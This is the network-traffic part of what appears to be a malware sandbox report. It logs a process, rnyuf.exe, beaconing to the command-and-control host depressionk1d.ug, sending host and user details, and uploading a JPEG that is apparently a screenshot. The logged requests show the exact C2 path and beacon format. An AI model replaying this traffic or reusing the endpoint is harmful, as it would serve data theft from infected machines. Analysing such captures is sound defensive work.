                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:24:06.070839882 CET10460OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:06.098948002 CET10461INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:06 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          24192.168.2.449806178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:22.347075939 CET2983OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----72f5cde377fbc84156c9f93b3b5c40e7
                          Host: depressionk1d.ug
                          Content-Length: 106960
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:22.347258091 CET2983OUTData Raw: 2d 2d 2d 2d 2d 2d 37 32 66 35 63 64 65 33 37 37 66 62 63 38 34 31 35 36 63 39 66 39 33 62 33 62 35 63 34 30 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------72f5cde377fbc84156c9f93b3b5c40e7Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:22.347424030 CET2993OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:22.347526073 CET2996OUTData Raw: 48 7a d2 d1 4c 42 52 d1 40 a0 61 45 14 1a 04 14 52 aa b3 1c 2a 92 7d 00 ab 29 a7 5e 49 f7 6d df fe 04 31 fc e8 49 bd 82 e5 5a 2b 49 34 4b a6 fb c6 34 fa 9c ff 00 2a ad 7b 68 6c a6 58 cb 86 25 77 64 0c 77 3f e1 54 e1 24 ae d0 26 8a d4 51 47 6a 91
                          Data Ascii: HzLBR@aER*})^Im1IZ+I4K4*{hlX%wdw?T$&QGjQ@(Z()h(4QEzE$q^?YM#_Iuq]L*I<c*:;R@E-RZ)1ERLBbPhRbRSR)EPA
                          Nov 12, 2021 22:23:22.369777918 CET3001OUTData Raw: 32 b1 f3 ab 0f 8c e7 f6 9c ae e6 87 83 bc 41 35 cd de 95 a1 5e e4 dc d9 5d b9 8d ba e5 04 32 82 09 f6 24 0f a7 d2 bc db e3 77 fc 94 79 7f eb d6 2f e5 5e a3 e1 7f 00 ea da 2f 88 ed 35 1b ab 8b 37 8a 1d fb 84 6e e5 b9 42 a3 19 51 ea 3b d7 97 7c 6d
                          Data Ascii: 2A5^]2$wy/^/57nBQ;|m7{E:O'uo0h5UY<hqBjeL~ko^4.J9\aAdqSG?"ibl.yT^kG
                          Nov 12, 2021 22:23:22.369811058 CET3007OUTData Raw: 17 fc 29 ba 2d a7 1e 8c 95 51 27 cd d5 1d cc 25 ed a0 b1 7b 96 09 73 af aa 68 d7 00 9e 62 68 91 e0 93 3c 8c 7c fe 43 7a 71 59 17 da 75 ed ee bd 71 6b 67 11 9e 2d 3e 4b 6d 25 48 75 00 cb b7 60 ea 47 de 74 73 9e 9c f3 8a e7 04 da 42 9c 8b 4b 9e 7f
                          Data Ascii: )-Q'%{shbh<|CzqYuqkg->Km%Hu`GtsBK)nQ2R_[S[Go$KfpV(z>e#J?*H4NR7iyr%T"rx)Gj)())i(R99P (9;@x25
                          Nov 12, 2021 22:23:22.369827032 CET3015OUTData Raw: dc e2 e6 f6 74 da 5d 7f ba 83 be 7f fd 78 ef d1 51 d4 9d 38 c2 71 e5 4a da bd b4 ed eb f3 39 a9 aa 70 a9 29 c2 5c cd df 45 be bd fd 3c ec 72 1e 2e de 7e 01 d9 87 ce ef b4 2e 33 e9 e6 3e 3f 4c 57 85 90 6b e9 1f 8b f6 d0 d9 7c 30 16 b0 26 c8 62 9e
                          Data Ascii: t]xQ8qJ9p)\E<r.~.3>?LWk|0&bE5)Tr:eN1#\f(mlfE.6JJ!)QE(((E.91EXZ)h(-PJ)Z(@GjQP)i(QE1KIQLAKE)h-SBZ
                          Nov 12, 2021 22:23:22.369844913 CET3019OUTData Raw: d3 85 37 14 e1 56 26 2d 3a 9b 4e a6 89 62 d2 8a 4a 51 54 21 69 69 29 c2 9a 24 50 29 d8 a4 a5 aa 44 86 29 71 45 2d 55 85 71 36 d2 62 9f 4b 45 85 72 3d b4 15 a9 71 46 29 f2 87 31 0e da 36 d4 db 68 db 9a 39 43 98 87 14 b8 a9 7c ba 36 52 e5 0e 64 44
                          Data Ascii: 7V&-:NbJQT!ii)$P)D)qE-Uq6bKEr=qF)16h9C|6RdDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbb
                          Nov 12, 2021 22:23:22.370318890 CET3021OUTData Raw: ac 5f 52 b6 29 71 52 9b 77 1d 54 d3 7c b2 3b 7e 94 f9 47 cc 86 8a 78 eb 40 4a 76 da a4 89 b8 0a 78 a6 81 4f 02 a8 86 18 a7 6d a4 a5 14 12 1b 28 d9 52 0a 70 a7 62 79 99 5c c7 49 e5 d5 ac 52 ec cd 16 0e 72 9f 97 49 e5 d5 df 2e 93 ca f6 a5 ca 3f 68
                          Data Ascii: _R)qRwT|;~Gx@JvxOm(Rpby\IRrI.?hRV^{BJ6!J\*S)EB&\Q`8\R7\S1\n(Q,+4E?|&lS~;5Y.)rL.;Z\~0}(hP*}'t@
                          Nov 12, 2021 22:23:22.392244101 CET3024OUTData Raw: 5c a5 c5 ee f8 9d a2 cb 0d 8b e5 8d b9 6c 13 b8 b7 19 5e f9 a7 db 78 d3 50 53 13 6a 16 36 77 4d 16 a3 06 a2 86 de de 1b 52 25 8d b2 c5 8c 71 8d db 94 91 93 9c 70 7d 8d 73 56 bf cf fc bf e0 90 e3 46 df 2f eb f4 24 d4 b4 48 ed db 52 53 a3 6b 5a 5b
                          Data Ascii: \l^xPSj6wMR%qp}sVF/$HRSkZ[ZMA3>8O}y>.R|R$%,er[BKj0Y+&zs1kVE$ZzK&w5!vC'ohV[kA!\8
                          Nov 12, 2021 22:23:22.392287016 CET3032OUTData Raw: 7e f8 98 7c f1 29 a7 ed a4 b7 46 c9 a7 b3 39 12 a4 76 34 9f 5a ea cd ad 9c bd 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d
                          Data Ascii: ~|)F9v4ZShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)
                          Nov 12, 2021 22:23:22.439791918 CET3093INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:22 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          240192.168.2.450051178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:06.738065958 CET10462OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:06.760540009 CET10464INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:06 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:06.760556936 CET10464INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          241192.168.2.450052178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:06.915276051 CET10466OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:06.937825918 CET10468INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:06 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:06.937835932 CET10468INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          242192.168.2.450054178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:07.077225924 CET10469OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:07.102319956 CET10470INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:07 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 